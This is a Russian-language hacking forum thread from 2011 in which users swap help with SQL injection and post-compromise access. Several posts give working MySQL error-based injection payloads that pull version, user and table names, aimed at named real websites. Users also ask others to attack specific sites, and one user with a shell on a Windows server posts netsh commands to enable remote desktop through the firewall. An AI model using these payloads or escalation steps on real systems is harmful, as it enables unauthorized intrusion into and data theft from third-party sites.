 |
|

15.09.2011, 21:23
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Пролез в бд но выдает все на непонятной кодировке..что можно сделать?
|
|
|

15.09.2011, 21:49
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от xa-xa89
А где-то подсмотреть результаты инсерта можно?
то почему бы просто не сделать вот так?
insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')
ну и селект не из это же таблицы, помним)
способ великолепен, спасибо, но к сожалению колонка subid INT, поэтому записать левак туда не удастся.
P.S.
попробовал
1' or(1,2)=(select count(*),concat((select concat(table_name,0x3a,column_name) from information_schema.columns where table_schema !=0x696e666f726d6174696f6e5f736368656d61 limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)+'
уже лучше.
MYSQL ERROR:
Operand should contain 1 column(s)
Можно же вывести через duplicate column ?
P.P.S
все решилось
1'+and+(select*from(select+count(*)from(select+1+u nion+select+2+union+select+3)x+group+by+concat(mid ((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES +limit+0,1),1,64),floor(rand(0)*2)))z)+and+'1
спасибо FlaktW
|
|
|

16.09.2011, 00:40
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
@попугай
если мы речь ведем про мускуль имеет место вот такое:
insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')
insert into TABLE (id, subid, date, data) values ('666', 'SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3','1','1')
это так сказать в защиту моей теории
|
|
|

16.09.2011, 01:16
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от xa-xa89
@попугай
если мы речь ведем про мускуль имеет место вот такое:
insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')
insert into TABLE (id, subid, date, data) values ('666', '
SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3
','1','1')
это так сказать в защиту моей теории
values ( скобкой не закрыта
|
|
|

16.09.2011, 21:29
|
|
Новичок
Регистрация: 13.06.2011
Сообщений: 27
С нами:
7850486
Репутация:
7
|
|
Сообщение от Kuteke
Помогите со скульей:
Код HTML:
http://www.gasniergicquel.com/customer/home.php?cat=2
Код HTML:
http://www.gasniergicquel.com/customer/help.php?section=presentation
Код:
http://www.gasniergicquel.com/customer/home.php?cat=2'and(select*from(select(name_const((select(concat_ws(0x3a,version(),user()))),1)),name_const((select(concat_ws(0x3a,version(),user()))),1))a)and'
|
|
|

17.09.2011, 06:10
|
|
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
С нами:
8357366
Репутация:
6
|
|
sourcec0de, спасибо! Помоги и этим:
Код HTML:
http://www.proximeety.gr/member-321531[sql].html
P.S. Сообщение не цитируйте, пожалуйста!
P.P.S. Модеры, не удаляйте это сообщение!
|
|
|

17.09.2011, 10:54
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Помогите скуль крутануть. Бред, не получается нихера = \
_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683
|
|
|

17.09.2011, 11:36
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от GroM88
Помогите скуль крутануть. Бред, не получается нихера = \
_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683
Там нету скули. Пропускаются только цифровые значения.
Сообщение от Kuteke
http://www.proximeety.gr/member-321531[sql].html
P.S. Сообщение не цитируйте, пожалуйста!
P.P.S. Модеры, не удаляйте это сообщение!
Специально буду цитировать твои сообщения, потому что ты поступаешь не по феншую.
|
|
|

17.09.2011, 20:09
|
|
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами:
7764086
Репутация:
0
|
|
Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(
вот код запуска, мб я что-то напутал?
Код:
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
|
|
|

17.09.2011, 20:40
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
а по моему это все делается через net start
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|